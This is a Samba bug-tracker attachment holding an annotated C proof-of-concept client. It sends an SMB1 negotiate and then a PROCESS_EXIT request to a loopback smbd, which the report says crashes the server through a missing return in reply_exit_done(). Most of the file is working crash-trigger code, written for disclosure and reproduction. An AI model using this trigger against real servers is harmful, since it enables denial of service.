The Samba-Bugzilla – Attachment 17995 Details for
Bug 15430
missing return in reply_exit_done()
client that sends an SMB_COM_PROCESS_EXIT that causes smbd to crash due to a missing return in reply_exit_done()
smbd13a.c (text/x-csrc), 5.54 KB, created by
Robert Morris
on 2023-07-24 09:05:35 UTC
Description:
client that sends an SMB_COM_PROCESS_EXIT that causes smbd to crash due to a missing return in reply_exit_done()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-24 09:05:35 UTC
Size:
5.54 KB
/*
 * Proof-of-concept client attached to Samba bug 15430.
 *
 * It connects to 127.0.0.1:445, sends an SMB1 SMB_COM_NEGOTIATE followed by an
 * SMB_COM_PROCESS_EXIT, and prints what it got back.  A harness that resets a
 * local Samba install and forks smbd in the foreground is present but compiled
 * out under "#if 0".  The bug report attributes the server crash to a missing
 * return in reply_exit_done(); nothing in this file depends on server-side
 * details beyond those two requests.
 *
 * Reviewer notes on the packet builders: multi-byte fields are written through
 * "*(short*)(buf+ii)" casts at odd offsets (unaligned access) and in host byte
 * order.  That is only harmless here because the values written are 0 or are
 * overwritten later, and because the tool targets a loopback test server.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>

int s = -1;   // connected TCP socket to the server; set in main()
int uid = 0;  // UID for the SMB header; never changed (no session setup is sent)
int tid = 0;  // TID for the SMB header; never changed (no tree connect is sent)
int fid = 0;  // not used anywhere in this file

/*
 * Write the 4-byte SMB-over-TCP length prefix plus the 32-byte SMB1 header
 * (MS-CIFS 2.2.3.1) for `command` into buf, and return the offset of the
 * first byte after the header (always 36).
 *
 * buf must have room for at least 36 bytes.  The length field at buf+2 is a
 * placeholder: both callers overwrite it once the full message size is known.
 * Note that "sizeof(buf)" below is the size of a char pointer, not of the
 * caller's array, so the placeholder value is meaningless — acceptable only
 * because it is always overwritten.
 */
int
header(char *buf, int command)
{
  int ii = 0;

  // SMB-over-TCP 4-byte header
  buf[ii++] = 0; // must be zero
  buf[ii++] = 0; // high byte of len
  *(short*)(buf+ii) = htons(sizeof(buf)-4); // placeholder; sizeof(buf) is sizeof(char*) here, caller fills the real length
  ii += 2;

  // 32-byte SMB header, MS-CIFS 2.2.3.1
  buf[ii++] = 0xff;
  buf[ii++] = 'S';
  buf[ii++] = 'M';
  buf[ii++] = 'B';
  buf[ii++] = command;
  buf[ii++] = 0; // status
  buf[ii++] = 0; // status
  buf[ii++] = 0; // status
  buf[ii++] = 0; // status
  buf[ii++] = 0; // flags
  *(short*)(buf+ii) = 0; // flags2
  ii += 2;
  *(short*)(buf+ii) = 0; // PIDHigh
  ii += 2;
  ii += 8; // SecurityFeatures: left as whatever the caller's memset put there
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(short*)(buf+ii) = tid; // TID, host byte order (0 in this program)
  ii += 2;
  *(short*)(buf+ii) = 0; // PIDLow
  ii += 2;
  *(short*)(buf+ii) = uid; // UID, host byte order (0 in this program)
  ii += 2;
  *(short*)(buf+ii) = 0; // MID
  ii += 2;

  return ii;
}

/*
 * Send an SMB_COM_NEGOTIATE (0x72, MS-CIFS 2.2.4.52) offering the single
 * dialect "NT LM 0.12", then read one reply and print a few of its fields.
 *
 * The entire 128-byte buffer is sent (ii is reset to sizeof(buf)), so the
 * bytes past the ByteCount-covered data are the 0x01 fill from memset.  The
 * reply parse does not check cc before indexing buf[36..39]; on a short or
 * failed read it prints values from the zeroed buffer instead of failing.
 */
void
negotiate()
{
  // SMB_COM_NEGOTIATE
  {
    char buf[128];
    memset(buf, 1, sizeof(buf));

    int ii = header(buf, 0x72);

    // parameter block, MS-CIFS 2.2.3.2
    int param_words = 0;
    buf[ii++] = param_words; // WordCount: number of 16-bit parameter words
    printf("parameters start at %d\n", ii);
    ii += param_words*2;

    // data block, MS-CIFS 2.2.3.3
    // SMB_COM_NEGOTIATE MS-CIFS 2.2.4.52
    int bci = ii;
    *(short*)(buf+ii) = 0; // ByteCount: number of data bytes after this field (filled in below)
    ii += 2;
    buf[ii++] = 0x02; // BufferFormat: dialect string follows
    char *dialect = "NT LM 0.12"; // old-ish
    memcpy(buf+ii, dialect, strlen(dialect) + 1); // including the NUL terminator
    ii += strlen(dialect) + 1;

    *(short*)(buf+bci) = ii - bci - 2; // ByteCount excludes its own two bytes

    ii = sizeof(buf); // send the whole buffer; trailing bytes are 0x01 padding ("this works")

    *(short*)(buf+2) = htons(ii-4); // non-inclusive len, big-endian per the TCP transport header

    assert(ii <= sizeof(buf));

    printf("negotiate writing %d bytes\n", ii); fflush(stdout);

    if(write(s, buf, ii) <= 0){
      perror("write");
      exit(1);
    }
  }

  {
    // read negotiate response, MS-CIFS 2.2.4.52.2
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = read(s, buf, sizeof(buf));
    // NOTE(review): cc is not checked before the fields below are read; a short
    // read or -1 just prints zeros from the memset.
    printf("read %d for negotiate response (expecting 87)\n", cc);
    printf("WordCount %d (expecting 17)\n", buf[36] & 0xff);
    printf("DialectIndex %d (expecting 0)\n", *(short*)(buf+37)); // unaligned, host byte order
    printf("SecurityMode 0x%x (expecting 0x1)\n", buf[37+2]);
  }
}

/*
 * Send an SMB_COM_PROCESS_EXIT (0x11, MS-CIFS 2.2.4.18): header, WordCount 0,
 * ByteCount 0, followed by the rest of the 64-byte buffer as 0xff padding,
 * since ii is reset to sizeof(buf) before the length prefix is finalised.
 * This is the request the bug report says reaches the missing return in
 * reply_exit_done().  One read of the reply is attempted and only its length
 * is printed; the "nt_create response" comment below appears to be a leftover
 * from a different test.
 */
void
smb_exit()
{
  // SMB_COM_PROCESS_EXIT, MS-CIFS 2.2.4.18
  {
    char buf[64];
    memset(buf, 0xff, sizeof(buf));

    int ii = header(buf, 0x11);

    // parameter block
    buf[ii++] = 0; // WordCount: no parameter words
    // ii is 37 at this point

    // data block
    int bci = ii;
    *(short*)(buf+ii) = 0; // ByteCount (filled in below)
    ii += 2;

    *(short*)(buf+bci) = ii - bci - 2; // evaluates to 0: no data bytes

    ii = sizeof(buf); // send the whole buffer; everything after offset 39 is 0xff padding

    *(short*)(buf+2) = htons(ii-4); // non-inclusive len

    assert(ii <= sizeof(buf));

    printf("smb_exit writing %d bytes\n", ii); fflush(stdout);

    if(write(s, buf, ii) <= 0){
      perror("write");
      exit(1);
    }
  }

  {
    // read nt_create response (comment appears to be stale; this is the PROCESS_EXIT reply)
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = read(s, buf, sizeof(buf));
    printf("read %d for smb_exit response\n", cc);
  }
}

/*
 * Test driver.  The "#if 0" section is a harness that resets a local Samba
 * install under /usr/rtm/samba4, forks smbd with --interactive, and relies on
 * the wait() at the bottom to notice if it dies.  As checked in, that section
 * is compiled out: the program only connects (with retries) to a server that
 * is already listening on 127.0.0.1:445, runs negotiate() then smb_exit(),
 * and then calls wait() although it has no child of its own.
 */
int
main()
{
  //struct rlimit r;
  //r.rlim_cur = r.rlim_max = 0;
  //setrlimit(RLIMIT_CORE, &r);

  int pid = -1; // pid of the forked smbd when the harness is enabled; -1 otherwise

  signal(SIGPIPE, SIG_IGN); // a write to a closed socket should return EPIPE, not kill us
  signal(SIGTERM, SIG_IGN);

#if 0
  system("killall nmbd smbd");
  sleep(1);

#if SYM
  // trick nmbd into thinking there is a non-local interface.
  system("ifconfig tap0 create ; ifconfig tap0 9.0.0.1 up");
  int tap0 = open("/dev/tap0", 2); // 2 is O_RDWR on common platforms
  if(tap0 < 0) { perror("/dev/tap0"); exit(1); }
  system("ifconfig");
#endif

  // NOTE(review): "2&>1" is most likely a typo for "2>&1"; this block is compiled out.
  system("/usr/rtm/samba4/sbin/nmbd --help > /dev/null 2&>1");
  system("/usr/rtm/samba4/sbin/smbd --help > /dev/null 2&>1");

  // wipe cached state so every run starts from the same server state
  system("rm -f /usr/rtm/samba4/var/cache/browse.dat");
  system("rm -f /usr/rtm/samba4/private/msg.sock/*");
  system("rm -f /usr/rtm/samba4/private/*.tdb");
  system("rm -f /usr/rtm/samba4/var/lock/msg.lock/*");
  system("rm -f /usr/rtm/samba4/var/locks/*");
  system("rm -f /usr/rtm/samba4/var/lock/*");
  system("chown root /usr/rtm/samba4/var/lock/msg.lock /usr/rtm/samba4/private/msg.sock");

  // these are just the result of smbpasswd -a z, xxxxxxxx
  system("cp -p /usr/rtm/passdb.tdb.precious /usr/rtm/samba4/private/passdb.tdb");
  system("cp -p /usr/rtm/secrets.tdb.precious /usr/rtm/samba4/private/secrets.tdb");

  // a small world-writable share tree for the server to export
  system("rm -rf /tmp/smb ; mkdir /tmp/smb /tmp/smb/d");
  system("echo 1 > /tmp/smb/1 ; echo 2 > /tmp/smb/d/2");
  system("chmod ogu+rw /tmp/smb /tmp/smb/* /tmp/smb/*/*");

  pid = fork();
  if(pid == 0){
    execl("/usr/rtm/samba4/sbin/smbd", "smbd", "--interactive", "--debuglevel=3", (void*)0);
    perror("exec nmbd"); // message says nmbd although smbd is what was exec'd
    exit(1);
  }
#endif


  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(445); // SMB over TCP
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");

  // retry once per second until the server accepts the connection
  // (a new socket is created each time; the failed one is closed)
  while(1){
    s = socket(AF_INET, SOCK_STREAM, 0);
    if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0)
      break;
    close(s);
    sleep(1);
  }

  sleep(1);

  negotiate();
  smb_exit();

  usleep(200000); // give the server a moment to react before the socket is closed
  close(s);

  // With the harness enabled this reaps the forked smbd.  With it disabled
  // there is no child, so wait() fails, st stays 0, WIFEXITED(0) holds, and
  // the "crashed" branch is never taken.  The while(1){} presumably parks the
  // process so the crashed server can be inspected — TODO confirm.
  int st = 0;
  int xpid = wait(&st);
  if(!WIFEXITED(st)){ printf("child %d crashed, wanted %d, st %d\n", xpid, pid, st); while(1){} }
}